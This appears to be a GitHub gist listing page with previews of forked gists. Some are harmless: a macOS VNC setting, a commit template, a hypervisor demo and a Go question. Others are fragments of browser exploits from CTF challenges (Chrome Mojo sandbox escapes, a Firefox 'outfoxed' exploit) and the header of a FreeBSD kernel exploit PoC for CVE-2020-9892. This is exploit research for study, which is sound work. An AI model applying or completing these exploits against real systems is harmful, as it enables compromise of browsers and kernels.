
Force recent MacOS to listen for screen sharing on localhost only, keeping SIP on

All the following has been validated on MacOS Mojave 10.14.6

Problems

While there is a command-line preference to accept only local VNC connections, that setting still doesn't prevent the daemon from listening on the wildcard address and advertising the service on Bonjour. I haven't actually tried to see if it restricted anything in modern versions of the operating system, but here it is for reference:

sudo defaults write /Library/Preferences/com.apple.RemoteManagement.plist VNCOnlyLocalConnections -bool yes
@shxdow
shxdow / git-commit-template.md
Created May 6, 2023 22:44 — forked from lisawolderiksen/git-commit-template.md
Use a Git commit message template to write better commit messages

Using Git Commit Message Templates to Write Better Commit Messages

The always enthusiastic and knowledgeable Mr. @jasaltvik shared with our team an article on writing (good) Git commit messages: How to Write a Git Commit Message. This excellent article explains why good Git commit messages are important, and explains what constitutes a good commit message. I wholeheartedly agree with what @cbeams writes in his article. (Have you read it yet? If not, go read it now. I'll wait.) It's sensible stuff. So I decided to start following the

@shxdow
shxdow / simplevm.c
Created February 20, 2023 10:04 — forked from imbushuo/simplevm.c
Demonstrates Hypervisor.Framework usage in Apple Silicon
// simplevm.c: demonstrates Hypervisor.Framework usage in Apple Silicon
// Based on the work by @zhuowei
// @imbushuo - Nov 2020
// To build:
// Prepare the entitlement with BOTH com.apple.security.hypervisor and com.apple.vm.networking WHEN SIP IS OFF
// Prepare the entitlement com.apple.security.hypervisor and NO com.apple.vm.networking WHEN SIP IS ON
// ^ Per @never_released, tested on 11.0.1, idk why
// clang -o simplevm -O2 -framework Hypervisor -mmacosx-version-min=11.0 simplevm.c
// codesign --entitlements simplevm.entitlements --force -s - simplevm
@shxdow
shxdow / index.html
Created April 19, 2022 23:04 — forked from hkraw/index.html
GoogleCtf 2021 fullchain
<html>
<head>
<title>google-ctf fullchain</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo/mojo_bindings.js'></script>
<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
@shxdow
shxdow / corctf_outfoxed.md
Created April 19, 2022 23:03 — forked from hkraw/corctf_outfoxed.md
first firefox pwn

outfoxed exp (First Blood)

let pwn = async function() {
  /* Helpers */
  let conversionBuffer = new ArrayBuffer(0x40)
  let floatView = new Float64Array(conversionBuffer)
  let intView = new BigUint64Array(conversionBuffer)

  BigInt.prototype.i2f = function() {
    intView[0] = this

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
@shxdow
shxdow / ip6_expl_poc.c
Created April 11, 2021 11:15 — forked from Cryptogenic/ip6_expl_poc.c
Kernel exploit PoC (Proof-of-Concept) for the IP6_EXTHDR_CHECK double free (CVE-2020-9892). Interleaves multiple threads for code exec. Mainly a reference for the PS4 implementation.
/*
* IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0
* https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78
* -
* Bug credit: Andy Nguyen (@theflow0)
* Exploit credit: @SpecterDev, @tihmstar
* Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011
* -
* Build: gcc -o expl ip6_expl_poc.c -pthread
* -
@shxdow
shxdow / go_io-read_packages.md
Created February 19, 2021 17:37 — forked from suntong/go_io-read_packages.md
[go-nuts] Differences between os, io, ioutils, bufio, bytes (with Buffer type) packages for file reading

http://grokbase.com/t/gg/golang-nuts/142spmv4fe/go-nuts-differences-between-os-io-ioutils-bufio-bytes-with-buffer-type-packages-for-file-reading

I'm quite confused, as there seem to be multiple redundant ways to solve my problem (read a file, parse the content, serve it via HTTP). Most people on Stack Overflow would use bufio, but I just can't get the differences between this package and the Buffer type of bytes, and just reading a file with the os methods. Also, I don't know when and why I should choose those ways to do it, when I have the simple, but non-versatile, ioutils.ReadFile.